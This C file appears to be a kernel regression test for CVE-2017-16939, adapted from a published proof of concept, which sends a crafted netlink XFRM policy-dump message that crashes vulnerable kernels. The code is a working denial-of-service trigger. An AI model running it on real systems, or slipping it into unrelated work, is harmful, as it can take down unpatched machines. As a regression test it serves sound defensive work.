1 /*
2 * Copyright (c) 2018 Michael Moese <mmoese@suse.de>
3 *
4 * This program is free software: you can redistribute it and/or modify
5 * it under the terms of the GNU General Public License as published by
6 * the Free Software Foundation, either version 2 of the License, or
7 * (at your option) any later version.
8 *
9 * This program is distributed in the hope that it will be useful,
10 * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 * GNU General Public License for more details.
13 *
14 * You should have received a copy of the GNU General Public License
15 * along with this program. If not, see <http://www.gnu.org/licenses/>.
16 */
17 /* Regression test for commit:
18 * 1137b5e2529a ipsec: Fix aborted xfrm policy dump crash aka CVE-2017-16939
19 *
20 * Based on the reproducing code from Mohammed Ghannam, published on
21 * https://blogs.securiteam.com/index.php/archives/3535
22 *
23 * CAUTION! If your system is vulnerable to this CVE, the kernel
24 * WILL DIE!
25 */
26
27 #include <unistd.h>
28 #include <sched.h>
29 #include <stdlib.h>
30 #include <string.h>
31 #include <sys/socket.h>
32 #include <sys/wait.h>
33 #include <netinet/in.h>
34 #include <linux/netlink.h>
35
36 #include "lapi/xfrm.h"
37 #include "tst_test.h"
38 #include "tst_res_flags.h"
39 #include "tst_safe_macros.h"
40 #include "tst_safe_net.h"
41 #include "lapi/namespaces_constants.h"
42
43 #define BUFSIZE 2048
44
45 static int fd;
46 static struct sockaddr_nl addr;
47
48 struct msg_policy {
49 struct nlmsghdr msg;
50 char buf[BUFSIZE];
51 };
52 static struct msg_policy *p;
53
setup(void)54 static void setup(void)
55 {
56 if (unshare(CLONE_NEWUSER) != 0)
57 tst_brk(TCONF, "unshare(CLONE_NEWUSER) failed");
58 if (unshare(CLONE_NEWNET) != 0)
59 tst_brk(TCONF, "unshare(CLONE_NEWNET) failed");
60
61 fd = SAFE_SOCKET(PF_NETLINK, SOCK_RAW, NETLINK_XFRM);
62 memset(&addr, 0, sizeof(struct sockaddr_nl));
63 addr.nl_family = AF_NETLINK;
64 addr.nl_pid = 0; /* packet goes into the kernel */
65 addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
66
67 p = SAFE_MALLOC(sizeof(struct msg_policy));
68 memset(p, 0, sizeof(struct msg_policy));
69
70 p->msg.nlmsg_len = 0x10;
71 p->msg.nlmsg_type = XFRM_MSG_GETPOLICY;
72 p->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;
73 p->msg.nlmsg_seq = 0x1;
74 p->msg.nlmsg_pid = 2;
75 }
76
run(void)77 static void run(void)
78 {
79 int var = 0x100;
80
81 SAFE_SETSOCKOPT(fd, 1, SO_RCVBUF, &var, sizeof(int));
82 SAFE_SENDTO(1, fd, (void *) &p->msg, p->msg.nlmsg_len, 0,
83 (struct sockaddr *) &addr,
84 sizeof(struct sockaddr_nl));
85
86 tst_res(TPASS, "Kernel seems to have survived");
87 }
88
89 static struct tst_test test = {
90 .setup = setup,
91 .test_all = run,
92 };
93